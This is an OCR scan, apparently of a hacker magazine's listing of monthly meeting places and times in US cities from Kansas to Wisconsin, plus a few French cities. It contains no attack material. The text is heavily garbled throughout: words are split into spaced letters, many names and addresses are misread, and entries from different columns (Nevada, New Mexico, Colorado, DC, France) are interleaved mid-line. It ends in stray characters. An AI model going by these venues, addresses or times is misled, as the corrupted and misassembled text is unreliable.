Park Mal ! food court.
Wichita: Ri versi de Perk, , ' 44
Bi t t i ng Avc.
Louisiana
Baton Rouge: I n the LSLJ Uni on
Bui l di ng, between the Ti ger Puse &
McDonal d's. 6 pm
New Orleans: Z'otz Coffee House
uptown at 82 1 0 Ock 51. 6 pm
Maine
Portland: Mai ne Mal l by the bench
at t he food court ooor.
Maryland
Baltimore: Bdfnps & Noble cdfe at
ti l' I nner Harbor
Massachusetts
Boston: Stratton Student Center
( Bui l di ng W20) dt MIT in the 2nd
fl oor l ounge ar ea. 6 pm
Marlborough: Sol omon Pdrk Mal l
food court. 6 pm
Northampton: l)ownstai r of
H<yrarket Cafe. 6 pm
Michigan
Ann Arbor: Starbucks i n The
Gal l eri , on S Uni V(r<i ty
Minnesota
Bloomington: Mal l of Ameri ca,
north si dp food court, between
the Dai ry QUfpn and thp Creek
food pi au' .
Missouri
Kansas City (Independence): Bdflle
& Noble, 1 9 1 2 0 E 39th St.
Sf. Louis: Cal l eri a food Court
Springfield: Borders Books ,mn
Musi c coffeeshop, J00 b Cl tn
"tom' Ave, one block south of Hatl e
fi el d Mal l . 5 : '\ 0 pm
Nebraska
Omaha: Crosroads Mal l rood
Court. 7 pm
Nevada
hookstore. 9 pm
I Hh .udCol l ege. 6 pm
Las Vegas: rejAVAnat( Coffee, 3300
Pri s: Pl a( e tiP 1.1 Rppubl i que, I lear
Lakewood: B,H rlPS oodNobl e i n
E Fl dmi ngo Rd (at Pecml. 7 pm
t ht, Iflnjlty) fountai n. |! pill ( he Denwr West Shoppi ng Center,
New Mexico
New York
New York: Ci ti group Center, i n
t he lobby, | '3 E ,3rd St, bptweell
|exi nglon & rd
Rochester: Pdnera Bread, 2 3 73 W
Ri dge Rd. 7: 30 pm
North Carolina
Charlotte: Panera Bread Company,
12 ' JW Cl ay Bl vd ( neM UNe
Charl otte). 6: 30 pm
Raleigh: Royal Bean coffee shop,
-Ol Hi l l sboro 5t ( next to the Pl ay
makers Sports Bar and across from
Meredi th Coi l egp) .
North Dakota
Fargo: West Acres Mal l food court
by the Taco j ohn's. 6 pm
Ohi o
Cincinnati: The Brew House, 1 047 E
McMi l l an. 7 pm
Cleveland: Uni versi ty Ci rcl e
Arabi ca, 1 1 300 ) uni ppr Rd. Upstai rs,
turn right, second room on left.
Columbus: Easton Town Center
at the food court across from the
i ndoor fountai n. 7 pm.
Dayton: TCI rriday's off 725 by the
Oayton Mal l .
Oklahoma
Oklahoma City: Cafe Bel l a, south
edst corner of SW 89th St and Penn.
Tulsa: Promenade Mal l food court
Oregon
Portland: Backspace Cafe, 1 1 5 NW
5th Avc. 6 pm
Pennsylvania
Allentown: Pnera Breao, : 1 00 W
Ti l ghman 51. 6 pm
Harrisburg: Pnera Bre,ld, 4263
Uni on Deposi t Rd. 6 pm
Philadelphia: 30th St Stati on,
southeast food court near mi ni
post office.
South Carolina
Charleston: Northwoods Mal l i n the
hal l between Sears and Chi k-Fi I A
South Dakota
Sioux Falls: Empi re Mal l , by Burger
Ki ng
Tennessee
Knoxville: Borders Books Cdfe
across from Westown Mal l .
Memphis: Quetzal , 664 Uni on
Ave. 6 pm
Nashville: Vanderbi l t Uni versi ty
Hi l l Center, Room 2J8, 1 1:1 1 l ath
Ave 5. 6 pr
Texas
Austin: 5pi dpr House Cafe, 2908
Fruth St, iront rour dUUS' lrulll
bar. 7 pm
Houston: Ni nfd's Expres i n front of
Nurdstrom's i n the Cal l eri a Mdl l
San Antonio: North SId( Mal l food
court. / pm
Utah
SaIL Lake City: ZCMI Mdl l i n The
Prk Food Court.
Vermont
Burlington: Borders Books at
Church St and CherTv St on t he
second fl oor of thf cafe.
Virginia
Arlington: (sec Di stri ct of Cul umbi dl
Blacksburg: Squi rps St udent Center
dt Vi rgi ni a Tech, ' 1 8 N . Mai n St.
7 pm
Charlottesville: rIlera Bread d! the
Barrdcks Road Shoppi ng Center
6:30 pm.
Virginia Beach: I ynnhaven Mall Oil
Lynnh'lVen Prkwdy. 6 pm
Washington
Seattle: Wdhi ngton State Conven
ti on Center. 2nd l evel . south si de.
f pm
Spokane: Coffce Stati on, 931 S N
Nevad,) { North Spokdne) . 6 pm
Wisconsin
Madison: Fai r Trade Coffee Hou<e,
4 1 8 State 51.
Rennes: I n Inlilt of the "tore " Bl ue 1 4.1 47 W Col tdX Avc Albuquerque: LJ l l i ver,i ty of New
All nlctings take place on the first
Hox" el (N' to PI,lce ell' 1 0 Repub- District of Columbia Mexiw Student Uni on Bui l di ng
Friday of the month. Unless olher-
l i lue. 8 p|+ Arlington: Pentagon City M,l l l bV ( pl an "l ower" If'vf'1 l ounge), 1n,1 I n
wise noted, they start at 5 pm local
Rouen: Pla( e de I ' Cltwdrei c by tht' phorH' booths next to P<l Ilcid LIpU<. Pdypholle: '0.-a4 3
-
9
03
3
,
time. To start a meeting in your city,
the bpnche in front. a pm hprt's,_ 6 pill .05 843-9034. 5: JO pm
send emai l to meetingsl 2600.com.
la
[
C 2%a
[
aZnC